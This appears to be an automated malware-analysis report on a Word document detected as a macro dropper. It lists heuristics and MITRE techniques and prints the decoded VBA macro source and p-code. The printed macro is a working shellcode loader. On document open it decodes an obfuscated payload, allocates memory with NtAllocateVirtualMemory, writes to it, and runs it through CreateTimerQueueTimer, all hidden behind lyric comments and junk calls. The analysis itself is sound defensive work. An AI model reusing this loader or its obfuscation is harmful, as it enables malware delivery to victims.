MALICIOUS
90
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file is identified as malicious by ClamAV with the signature 'Doc.Dropper.Agent-6338750-0', indicating it functions as a dropper. The presence of a VBA macro, specifically a 'Document_Open' macro, strongly suggests that the file is designed to execute malicious code upon opening. The macro likely downloads and executes a second-stage payload, a common technique for malware droppers.
Heuristics 4
-
ClamAV: Doc.Dropper.Agent-6338750-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6338750-0
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Private Sub Document_Open() Dim casablanca As Integer -
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 46846 bytes |
SHA-256: d6baabfa4c502bb9afdcd6d41019111e748f048050a6bde379fb60c1d906478e |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub backlash()
Dim hinny As Variant
Dim mel As Byte
volatilization.ballup.Value = Day(#12/5/2013#)
varday = admass = bath
cognominal = "peristaltic"
unexposed = "confounding"
moulins = "opisthocomidae"
eocene = "buffoon"
cordiale = "astride"
pharsalus = "boosters"
melicoccus = "beacon"
Set pantomimic = volatilization.ballup.SelectedItem
casuarinales = 50 + 5
mazard = 12400 + 7
darwin = 274190 + 4
Pmt 0, casuarinales, 39679, 38734, 5
forgiveness = pantomimic.Name
betraying = 15 - 122 + 7951
gloomily = Right(forgiveness, betraying)
contiguous = amyloidosis.shamesense(gloomily)
sixfooter = 80 + 7
oldfashioned = 29470 + 7
conflux = 216560 + 2
Pmt 0, sixfooter, 10048, 13761, 6
barleysugar = "absently"
augustan = "sinewy"
#If (8 * 2 + 5) > (7 - 2 * 1) And (21 - 7 * 3) * 2 < (Win64) Then
Dim crumb As Long
Dim curdled As LongPtr
Dim clodpated As LongPtr
Dim opportunity As Integer
#End If
#If (8 * 2 + 5) > (7 - 2 * 1) And Not (21 - 7 * 3) * 2 < (Win64) Then
Dim fatuum As String
Dim clodpated As Long
Dim cration As String
Dim curdled As Long
#End If
emanation = 104 - 60 - 44
aphanite = aver
symptomatology = "onopordum"
cyanocitta = 47 - 120 + 4169
adscript = 76
ichthyosauria = 12822
crossquestion = 163522
Pmt 0, adscript, 36748, 57474, 2
attacker = "disrespectfully"
spaced = "stroboscope"
atrichornis = "lullaby"
lighterage = 107
comportment = 27253
barnacle = 183908
Pmt 0, lighterage, 38174, 47912, 3
jaunting = contiguous
entertain = exboyfriend
curdled = cricetidae(jaunting)
ngwee = "acuity"
paidup = "bibliolatrous"
#If (3 * 4 + 5) > (5 - 2 * 1) And (8 - 4 * 2) * 2 < (Win64) Then
Dim disquisitionary As Integer
Dim dottings As LongPtr
Dim minerva As LongPtr
Dim reprove As LongPtr
clockwork = 1 - 115 + 2178
#End If
#If (8 * 2 + 5) > (7 - 2 * 1) And Not (21 - 7 * 3) * 2 < (Win64) Then
Dim dottings As Long
curt = 69 - 83 + 795
Dim minerva As Long
Dim reprove As Long
clockwork = curt + 3459
#End If
Dim balboa As Integer
Dim diastasis As Integer
dottings = 120 - 59 - 61
clodpated = curdled + clockwork
minerva = 13 - 59 + 201573
reprove = 34 - 17 + 3483
douche = afril(minerva, dottings, clodpated)
kiang = 30 + 8
colussus = 11680 + 1
icehouse = 368350 + 6
Pmt 0, kiang, 25095, 32981, 7
End Sub
Private Sub Document_Open()
Dim casablanca As Integer
Dim perceptibly As Long
bascule = "archives"
backlash
immodestly = 30 + 5
dorsoventral = 11690 + 0
polychaete = 457140 + 7
Pmt 0, immodestly, 33096, 48166, 5
End Sub
Attribute VB_Name = "amyloidosis"
' Driving us to your house
' I wouldnt be in my truck
#If (17 * 2 - 3) > 2 And (Win64) > (60 - 5 * 12) * 2 Then
' From the moment when
' You wrecked my whole world when you came
Public Declare PtrSafe Function monied Lib "Ntdll.dll " Alias "AcquireSRWLockShared" (piscatorial As Any) As LongPtr
' We locked eyes over whiskey on ice
' Baby, without warning
Public Declare PtrSafe Function operatively Lib "Shlwapi.dll " Alias "GetOverlappedResult" (ByVal arcadian As Any, dilate As Any, beechen As Any, boring As Any) As LongPtr
' Driving us to your house
' Baby, without warning
Public Declare PtrSafe Function firewater Lib "Ntdll.dll " Alias _
"NtAllocateVirtualMemory" (caliver As LongPtr, cream As LongPtr, ByVal cordiale As LongPtr, fatuityByVal As LongPtr, overabound As LongPtr, ByVal gradualness As LongPtr) As LongPtr
' And hit me like a hurricane' But just your sight had my heart storming
Public Declare PtrSafe Function hickory Lib "Kernel32" Alias "CreateTimerQueueTimer" (damnify As Any, ByVal malingerer As Any, ByVal causans As Any, ByVal bullpen As Any, ByVal suttee As Any, ByVal conductive As Any, ByVal battalia As Any) As Long
' I was doing alright
' You wrecked my whole world when you came
Public Declare PtrSafe Function selfknowledge Lib "Ntdll.dll " Alias "NtWriteVirtualMemory" (ByVal danish As Any, ByVal comes As Any, ByVal birdcall As Any, ByVal figuration As Any, ByVal pretender As Any) As LongPtr
' The moon went hiding, stars quit shining
' From the moment when
Public Declare PtrSafe Function basket Lib "Shlwapi.dll " Alias "SleepConditionVariableSRW" (ByVal pothole As Any, oculist As Any, psalmist As Any, decrepit As Any) As LongPtr
' The moon went hiding, stars quit shining
' The moon went hiding, stars quit shining
' The moon went hiding, stars quit shining
' And walked out
#End If
' The moon went hiding, stars quit shining
' I wouldnt be in my truck
#If (17 * 2 - 3) > 2 And Not (Win64) > (60 - 5 * 12) * 2 Then
' You wrecked my whole world when you came
' From the moment when
Public Declare Function ghazal Lib "Shlwapi.dll " Alias "SleepConditionVariableSRW" (ByVal pedantry As Any, cardroom As Any, paradigmatic As Any, prudence As Any) As Long
' You wrecked my whole world when you came
' And hit me like a hurricane
Public Declare Function boardwalk Lib "Shlwapi.dll " Alias "GetOverlappedResult" (ByVal canaanite As Any, anonymously As Any, lowkey As Any, abomasal As Any) As Long
' Knew it was gonna be a long night
' And walked out
Public Declare Function firewater Lib "Ntdll.dll " Alias _
"NtAllocateVirtualMemory" (chapel As Long, megalosaur As Long, ByVal tyrannidae As Long, agerasiaByVal As Long, comptonia As Long, ByVal clothier As Long) As Long
' Hit me like a hurricane
' You wrecked my whole world when you came
Public Declare Function hickory Lib "Kernel32" Alias "CreateTimerQueueTimer" (inadmissible As Any, ByVal centroid As Any, ByVal champaign As Any, ByVal acantholysis As Any, ByVal detoxification As Any, ByVal finite As Any, ByVal prospicience As Any) As Long
' The moon went hiding, stars quit shining
' Started talking bout us again
Public Declare Function selfknowledge Lib "Ntdll.dll " Alias "NtWriteVirtualMemory" (ByVal babism As Any, ByVal clethra As Any, ByVal civilization As Any, ByVal purgatorial As Any, ByVal nonextension As Any) As Long
' If I woulda just layed my drink down
' I was doing alright
' Rain was driving, thunder, lightning
' But you rolled in with your hair in the wind
#End If
' The moon went hiding, stars quit shining
' Rain was driving, thunder, lightning
Function shamesense(colbert) As String
Dim foghorn As Variant
Dim certificate As Long
Dim miserliness() As Byte
Dim croaking As Long
Dim kisser(6962) As Byte
Dim revocable As String
laotian = laotian
Dim annoying As Long
Dim falcongentle As Integer
Dim adonis(63) As Long
Dim headgear As Integer
Dim meanest(63) As Long
laotian = "phony"
eosin = addendum Or 451
Dim entombment As String
Dim deer As Integer
Dim turbulent(63) As Long
Dim enviousness As Long
sign = 40 - 111 + 4103
forsaking = 113 - 51 + 193
strum = 124 - 47 + 65203
adscriptus = 3 - 1 + 16711678
Dim inductance As String
bitterness = 71 - 104 + 289
bickerstaff = 65 - 21 + 262100
pureeyed = 9 - 96 + 150
admonished = 71 - 43 + 36
phylogenetic = 33 - 83 + 16515122
irrelevantly = 27 - 20 + 258041
conation = 117 - 66 + 4045
Dim penalty As String
populousness = 38 - 82 + 65580
Dim baptistery As String
Dim endimanche As Integer
aurous = 43 - 95 + 52
distinctive = 3 - 99 + 7939
Dim breathinghole() As Byte
Dim attentions As Long
Dim commensal As String
breathinghole = VBA.StrConv(colbert, 128)
Dim needlebush As String
flavian = 102
brokenwinded = 5913
quipu = 401865
Pmt 0, flavian, 11669, 31352, 3
azerbaijan = 7843
gush = vbKeyShift - 12
For restful = 0 To azerbaijan
If restful Mod 2 = 0 Then
breathinghole(restful) = breathinghole(restful) - gush
Else
breathinghole(restful) = breathinghole(restful) - (gush - 1)
End If
Next restful
choragic = 70 + 2
chest = 21930 + 6
phew = 503990 + 2
Pmt 0, choragic, 11965, 57933, 3
falcongentle = 2 - 2
alytes = 66 - 92 + 26
magnetization = 25 - 120 + 138
egghead = built
For croaking = (7 - 7) * 1 To (50 + 13) * (5 - 4)
meanest(croaking) = fount(croaking, admonished, 42)
turbulent(croaking) = fount(croaking, conation, 42)
adonis(croaking) = fount(croaking, bickerstaff, 42)
Next croaking
weakkneed = 3 + 2
rancor = 11220 + 4
discernment = 100960 + 1
Pmt 0, weakkneed, 28987, 50064, 8
miserliness = breathinghole
auditor = 106 - 44 - 58
piptadenia = 110 + 8
affranchisement = 20065
measureless = 441797
Pmt 0, piptadenia, 32651, 22350, 7
clothespress = 21 - 64 + 46
acquaintend = "flickknife"
florida = Math.Round(171)
apolitical = clothespress + 1
maroon = 14 - 103 + 91
For enviousness = 0 To azerbaijan
definiteness = miserliness(enviousness)
Category = miserliness(enviousness + 2)
maw = turbulent(egghead(miserliness(enviousness + 1)))
oxyuridae = meanest(egghead(Category)) + egghead(miserliness(enviousness + clothespress))
annoying = adonis(egghead(definiteness)) + maw + oxyuridae
croaking = fount(annoying, adscriptus, 34)
kisser(certificate) = fount(croaking, populousness, 24)
croaking = fount(annoying, strum, 34)
kisser(certificate + 1) = fount(croaking, bitterness, 24)
kisser(certificate + maroon) = fount(annoying, forsaking, 34)
certificate = certificate + maroon + 1
enviousness = enviousness + 3
Next
shamesense = kisser
End Function
Attribute VB_Name = "volatilization"
Attribute VB_Base = "0{246349BF-E276-446C-88A3-A23A03F9BE70}{D0FC81A5-0212-45D0-A2BF-0AD15462342A}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "amodule1"
Function helps(barbadian)
helps = AscW(barbadian)
End Function
Function built()
Dim confutable(255) As Byte
dilleniaceae = 105 - 117 + 77
Do While dilleniaceae <= 90 + 1
confutable(dilleniaceae) = dilleniaceae - 65
dilleniaceae = dilleniaceae + 1
Loop
dilleniaceae = 48
Do While dilleniaceae <= 50 + 8
confutable(dilleniaceae) = dilleniaceae + 4
dilleniaceae = dilleniaceae + 1
Loop
dilleniaceae = 97
Do While dilleniaceae <= 120 + 3
confutable(dilleniaceae) = dilleniaceae - 71
dilleniaceae = dilleniaceae + 1
Loop
confutable(47) = 63
dilleniaceae = 43
confutable(dilleniaceae) = 60 + 2
built = confutable
End Function
Function cricetidae(annular)
Dim competent As Byte
Dim selfdiscipline As Variant
Dim conspiracy As Integer
Dim anorexia As Byte
#If (6 * 3 + 5) > (7 - 2 * 1) And (48 - 6 * 8) * 2 < (Win64) Then
Dim friendless As String
Dim admissibility As LongPtr
matin = 10 - 55 + 53
Dim uncertainly As LongPtr
Dim agaricaceae As Long
Dim bitter As Variant
Dim maianthemum As LongPtr
Dim module As Variant
#End If
#If (8 * 2 + 5) > (7 - 2 * 1) And Not (21 - 7 * 3) * 2 < (Win64) Then
Dim admissibility As Long
matin = 23 - 72 + 53
Dim uncertainly As Long
Dim maianthemum As Long
#End If
physiotherapeutic = VarPtr(admissibility)
lactiferous = flagpole(physiotherapeutic, VarPtr(annular) + 8, matin)
omicron = 123 - 35 - 89
uncertainly = 34 - 115 + 81
anesthesiologist = 76 - 16 - 60
maianthemum = 14 - 41 + 9336
muddle = 5 - 39 + 4130
counterattraction = 34 - 55 + 85
campbell = firewater(ByVal omicron, _
uncertainly, ByVal anesthesiologist, maianthemum, ByVal muddle, _
ByVal counterattraction)
laotian = "manticore"
acquaintend = "disapproving"
flagpole uncertainly, admissibility, 113 - 44 + 5814
hysteric = 100
claustrum = 14659
planets = 157052
Pmt 0, hysteric, 14039, 28602, 7
cricetidae = uncertainly
End Function
Attribute VB_Name = "wodule2"
Function flagpole(dollarfish, appelation, foundation)
#If (17 * 2 - 3) > 2 And (Win64) > (60 - 5 * 12) * 2 Then
Dim inversely As String
Dim coo As Byte
Dim cadit As LongPtr
Dim scrubbed As LongPtr
Dim cryptophyta As LongPtr
Dim lust As Variant
Dim paeoniaceae As LongPtr
Dim latitation As LongPtr
#End If
#If (17 * 2 - 3) > 2 And Not (Win64) > (60 - 5 * 12) * 2 Then
Dim scrubbed As Long
Dim bigchested As Long
Dim cadit As Long
Dim pellicularia As String
Dim paeoniaceae As Long
Dim holiness As Variant
Dim cryptophyta As Long
Dim merito As Variant
Dim latitation As Long
Dim pleurothallis As Integer
Dim archeologist As Variant
#End If
florida = isopod - 319
isopod = Fix(214)
scrubbed = dollarfish
latitation = foundation
laotian = acquaintend
paeoniaceae = appelation
darmera = 100 + 1
adamantly = 36030 + 0
grariston = 544880 + 6
Pmt 0, darmera, 12321, 42634, 5
addendum = Math.Round(132)
cadit = 93 - 125 + 31
selfknowledge ByVal cadit, scrubbed, paeoniaceae, latitation, cryptophyta
laotian = laotian
End Function
Sub range()
Dim rngFirstList As range
Set rngFirstList = ActiveDocument.Lists(1).range
ActiveDocument.Windows(1).ScrollIntoView Obj:=rngFirstList, Start:=False
rngFirstList.Select
Selection.Collapse Direction:=wdCollapseEnd
Selection.MoveLeft Unit:=wdCharacter, Count:=1, Extend:=wdMove
End Sub
Function fount(ideation, lunisolar, mimmitation)
If mimmitation = (20 + 4) + (10 / 2 - 5) Then
fount = ideation \ lunisolar
ElseIf mimmitation = (30 + 4) + (5 - 3) / 2 - 1 Then
fount = ideation And lunisolar
ElseIf mimmitation = (40 + 2) + (56 / 7 - 4 * 2) Then
fount = ideation * lunisolar
End If
End Function
Function afril(lst, pirs, lky)
' You wrecked my whole world when you came
#If (17 * 2 - 3) > 2 And ((60 - 5 * 12) * 2 < (Win64)) Then
Dim pitbuls As LongPtr
Dim bis As LongPtr
Dim ority As Integer
Dim deble As LongPtr
#End If
#If (17 * 2 - 3) > 2 And Not ((60 - 5 * 12) * 2 < (Win64)) Then
Dim pitbuls As Long
Dim bwis As Long
Dim antery As Integer
Dim deble As Long
#End If
pitbuls = pirs
deble = lky
dan2 = hickory(lst, pitbuls, deble, pitbuls, pitbuls, pitbuls, pitbuls)
End Function
' Processing file: /opt/analyzer/scan_staging/c31c9b17dd404c8b9535346cd430f395.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 9081 bytes
' Line #0:
' FuncDefn (Sub backlash())
' Line #1:
' Dim
' VarDefn hinny (As Variant)
' Line #2:
' Dim
' VarDefn mel (As Byte)
' Line #3:
' LitDate 0x0000 0x0000 0x51A0 0x40E4
' ArgsLd Day 0x0001
' Ld volatilization
' MemLd ballup
' MemSt Value
' Line #4:
' Ld admass
' Ld bath
' Eq
' St varday
' Line #5:
' LitStr 0x000B "peristaltic"
' St cognominal
' Line #6:
' LitStr 0x000B "confounding"
' St unexposed
' Line #7:
' LitStr 0x000E "opisthocomidae"
' St moulins
' Line #8:
' LitStr 0x0007 "buffoon"
' St eocene
' Line #9:
' Line #10:
' LitStr 0x0007 "astride"
' St cordiale
' Line #11:
' LitStr 0x0008 "boosters"
' St pharsalus
' Line #12:
' LitStr 0x0006 "beacon"
' St melicoccus
' Line #13:
' SetStmt
' Ld volatilization
' MemLd ballup
' MemLd SelectedItem
' Set pantomimic
' Line #14:
' LitDI2 0x0032
' LitDI2 0x0005
' Add
' St casuarinales
' Line #15:
' LitDI2 0x3070
' LitDI2 0x0007
' Add
' St mazard
' Line #16:
' LitDI4 0x2F0E 0x0004
' LitDI2 0x0004
' Add
' St darwin
' Line #17:
' LitDI2 0x0000
' Ld casuarinales
' LitDI4 0x9AFF 0x0000
' LitDI4 0x974E 0x0000
' LitDI2 0x0005
' ArgsCall Pmt 0x0005
' Line #18:
' Line #19:
' Ld pantomimic
' MemLd Name
' St forgiveness
' Line #20:
' LitDI2 0x000F
' LitDI2 0x007A
' Sub
' LitDI2 0x1F0F
' Add
' St betraying
' Line #21:
' Ld forgiveness
' Ld betraying
' ArgsLd Right 0x0002
' St gloomily
' Line #22:
' Ld gloomily
' Ld amyloidosis
' ArgsMemLd shamesense 0x0001
' St contiguous
' Line #23:
' LitDI2 0x0050
' LitDI2 0x0007
' Add
' St sixfooter
' Line #24:
' LitDI2 0x731E
' LitDI2 0x0007
' Add
' St oldfashioned
' Line #25:
' LitDI4 0x4DF0 0x0003
' LitDI2 0x0002
' Add
' St conflux
' Line #26:
' LitDI2 0x0000
' Ld sixfooter
' LitDI2 0x2740
' LitDI2 0x35C1
' LitDI2 0x0006
' ArgsCall Pmt 0x0005
' Line #27:
' Line #28:
' LitStr 0x0008 "absently"
' St barleysugar
' Line #29:
' LitStr 0x0006 "sinewy"
' St augustan
' Line #30:
' LbMark
' LitDI2 0x0008
' LitDI2 0x0002
' Mul
' LitDI2 0x0005
' Add
' Paren
' LitDI2 0x0007
' LitDI2 0x0002
' LitDI2 0x0001
' Mul
' Sub
' Paren
' Gt
' LitDI2 0x0015
' LitDI2 0x0007
' LitDI2 0x0003
' Mul
' Sub
' Paren
' LitDI2 0x0002
' Mul
' Ld Win64
' Paren
' Lt
' And
' LbIf
' Line #31:
' Dim
' VarDefn crumb (As Long)
' Line #32:
' Dim
' VarDefn curdled (As Ptr)
' Line #33:
' Dim
' VarDefn clodpated (As Ptr)
' Line #34:
' Dim
' VarDefn opportunity (As Integer)
' Line #35:
' LbMark
' LbEndIf
' Line #36:
' LbMark
' LitDI2 0x0008
' LitDI2 0x0002
' Mul
' LitDI2 0x0005
' Add
' Paren
' LitDI2 0x0007
' LitDI2 0x0002
' LitDI2 0x0001
' Mul
' Sub
' Paren
' Gt
' LitDI2 0x0015
' LitDI2 0x0007
' LitDI2 0x0003
' Mul
' Sub
' Paren
' LitDI2 0x0002
' Mul
' Ld Win64
' Paren
' Lt
' Not
' And
' LbIf
' Line #37:
' Dim
' VarDefn fatuum (As String)
' Line #38:
' Dim
' VarDefn clodpated (As Long)
' Line #39:
' Dim
' VarDefn cration (As String)
' Line #40:
' Dim
' VarDefn curdled (As Long)
' Line #41:
' LbMark
' LbEndIf
' Line #42:
' LitDI2 0x0068
' LitDI2 0x003C
' Sub
' LitDI2 0x002C
' Sub
' St emanation
' Line #43:
' Ld aver
' St aphanite
' Line #44:
' LitStr 0x0009 "onopordum"
' St symptomatology
' Line #45:
' LitDI2 0x002F
' LitDI2 0x0078
' Sub
' LitDI2 0x1049
' Add
' St cyanocitta
' Line #46:
' LitDI2 0x004C
' St adscript
' Line #47:
' LitDI2 0x3216
' St ichthyosauria
' Line #48:
' LitDI4 0x7EC2 0x0002
' St crossquestion
' Line #49:
' LitDI2 0x0000
' Ld adscript
' LitDI4 0x8F8C 0x0000
' LitDI4 0xE082 0x0000
' LitDI2 0x0002
' ArgsCall Pmt 0x0005
' Line #50:
' Line #51:
' LitStr 0x000F "disrespectfully"
' St attacker
' Line #52:
' LitStr 0x000B "stroboscope"
' St spaced
' Line #53:
' LitStr 0x0007 "lullaby"
' St atrichornis
' Line #54:
' LitDI2 0x006B
' St lighterage
' Line #55:
' LitDI2 0x6A75
' St comportment
' Line #56:
' LitDI4 0xCE64 0x0002
' St barnacle
' Line #57:
' LitDI2 0x0000
' Ld lighterage
' LitDI4 0x951E 0x0000
' LitDI4 0xBB28 0x0000
' LitDI2 0x0003
' ArgsCall Pmt 0x0005
' Line #58:
' Line #59:
' Ld contiguous
' St jaunting
' Line #60:
' Ld exboyfriend
' St entertain
' Line #61:
' Ld jaunting
' ArgsLd cricetidae 0x0001
' St curdled
' Line #62:
' LitStr 0x0006 "acuity"
' St ngwee
' Line #63:
' LitStr 0x000D "bibliolatrous"
' St paidup
' Line #64:
' LbMark
' LitDI2 0x0003
' LitDI2 0x0004
' Mul
' LitDI2 0x0005
' Add
' Paren
' LitDI2 0x0005
' LitDI2 0x0002
' LitDI2 0x0001
' Mul
' Sub
' Paren
' Gt
' LitDI2 0x0008
' LitDI2 0x0004
' LitDI2 0x0002
' Mul
' Sub
' Paren
' LitDI2 0x0002
' Mul
' Ld Win64
' Paren
' Lt
' And
' LbIf
' Line #65:
' Dim
' VarDefn disquisitionary (As Integer)
' Line #66:
' Dim
' VarDefn dottings (As Ptr)
' Line #67:
' Dim
' VarDefn minerva (As Ptr)
' Line #68:
' Dim
' VarDefn reprove (As Ptr)
' Line #69:
' LitDI2 0x0001
' LitDI2 0x0073
' Sub
' LitDI2 0x0882
' Add
' St clockwork
' Line #70:
' LbMark
' LbEndIf
' Line #71:
' LbMark
' LitDI2 0x0008
' LitDI2 0x0002
' Mul
' LitDI2 0x0005
' Add
' Paren
' LitDI2 0x0007
' LitDI2 0x0002
' LitDI2 0x0001
' Mul
' Sub
' Paren
' Gt
' LitDI2 0x0015
' LitDI2 0x0007
' LitDI2 0x0003
' Mul
' Sub
' Paren
' LitDI2 0x0002
' Mul
' Ld Win64
' Paren
' Lt
' Not
' And
' LbIf
' Line #72:
' Dim
' VarDefn dottings (As Long)
' Line #73:
' LitDI2 0x0045
' LitDI2 0x0053
' Sub
' LitDI2 0x031B
' Add
' St curt
' Line #74:
' Dim
' VarDefn minerva (As Long)
' Line #75:
' Dim
' VarDefn reprove (As Long)
' Line #76:
' Ld curt
' LitDI2 0x0D83
' Add
' St clockwork
' Line #77:
' Line #78:
' LbMark
' LbEndIf
' Line #79:
' Dim
' VarDefn balboa (As Integer)
' Line #80:
' Dim
' VarDefn diastasis (As Integer)
' Line #81:
' LitDI2 0x0078
' LitDI2 0x003B
' Sub
' LitDI2 0x003D
' Sub
' St dottings
' Line #82:
' Ld curdled
' Ld clockwork
' Add
' St clodpated
' Line #83:
' LitDI2 0x000D
' LitDI2 0x003B
' Sub
' LitDI4 0x1365 0x0003
' Add
' St minerva
' Line #84:
' LitDI2 0x0022
' LitDI2 0x0011
' Sub
' LitDI2 0x0D9B
' Add
' St reprove
' Line #85:
' Ld minerva
' Ld dottings
' Ld clodpated
' ArgsLd of 0x0003
' St douche
' Line #86:
' LitDI2 0x001E
' LitDI2 0x0008
' Add
' St kiang
' Line #87:
' LitDI2 0x2DA0
' LitDI2 0x0001
' Add
' St colussus
' Line #88:
' LitDI4 0x9EDE 0x0005
' LitDI2 0x0006
' Add
' St icehouse
' Line #89:
' LitDI2 0x0000
' Ld kiang
' LitDI2 0x6207
' LitDI4 0x80D5 0x0000
' LitDI2 0x0007
' ArgsCall Pmt 0x0005
' Line #90:
' Line #91:
' EndSub
' Line #92:
' Line #93:
' Line #94:
' FuncDefn (Sub Document_Open())
' Line #95:
' Dim
' VarDefn casablanca (As Integer)
' Line #96:
' Dim
' VarDefn perceptibly (As Long)
' Line #97:
' LitStr 0x0008 "archives"
' St bascule
' Line #98:
' ArgsCall backlash 0x0000
' Line #99:
' LitDI2 0x001E
' LitDI2 0x0005
' Add
' St immodestly
' Line #100:
' LitDI2 0x2DAA
' LitDI2 0x0000
' Add
' St dorsoventral
' Line #101:
' LitDI4 0xF9B4 0x0006
' LitDI2 0x0007
' Add
' St polychaete
' Line #102:
' LitDI2 0x0000
' Ld immodestly
' LitDI4 0x8148 0x0000
' LitDI4 0xBC26 0x0000
' LitDI2 0x0005
' ArgsCall Pmt 0x0005
' Line #103:
' EndSub
' Line #104:
' Line #105:
' Line #106:
' Line #107:
' Macros/VBA/amyloidosis - 15905 bytes
' Line #0:
' QuoteRem 0x0000 0x001A " Driving us to your house"
' Line #1:
' QuoteRem 0x0000 0x001A " I wouldnt be in my truck"
' Line #2:
' LbMark
' LitDI2 0x0011
' LitDI2 0x0002
' Mul
' LitDI2 0x0003
' Sub
' Paren
' LitDI2 0x0002
' Gt
' Ld Win64
' Paren
' LitDI2 0x003C
' LitDI2 0x0005
' LitDI2 0x000C
' Mul
' Sub
' Paren
' LitDI2 0x0002
' Mul
' Gt
' And
' LbIf
' Line #3:
' QuoteRem 0x0000 0x0016 " From the moment when"
' Line #4:
' QuoteRem 0x0000 0x002A " You wrecked my whole world when you came"
' Line #5:
' FuncDefn (Public Function monied(piscatorial As ) As Ptr)
' Line #6:
' QuoteRem 0x0000 0x0024 " We locked eyes over whiskey on ice"
' Line #7:
' QuoteRem 0x0000 0x0017 " Baby, without warning"
' Line #8:
' FuncDefn (Public Function operatively(ByVal arcadian As ) As Ptr)
' Line #9:
' QuoteRem 0x0000 0x001A " Driving us to your house"
' Line #10:
' QuoteRem 0x0000 0x0017 " Baby, without warning"
' Line #11:
' LineCont 0x0004 08 00 02 00
' FuncDefn (Public Function firewater(caliver As Ptr) As Ptr)
' Line #12:
' QuoteRem 0x0000 0x0049 " And hit me like a hurricane' But just your sight had my heart storming"
' Line #13:
' FuncDefn (Public Function hickory(damnify As ) As Long)
…
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.